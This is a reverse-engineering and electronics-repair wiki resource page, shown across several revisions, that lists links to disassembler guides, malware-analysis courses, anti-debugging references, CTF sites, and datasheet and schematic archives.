::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Literature

2025-08-02T00:52:23Z

Polymorphic7: add whycan Chinese embedded arm devel community.

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Literature

2025-07-08T15:17:03Z

Polymorphic7: added cp Anti-Debug Tricks

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

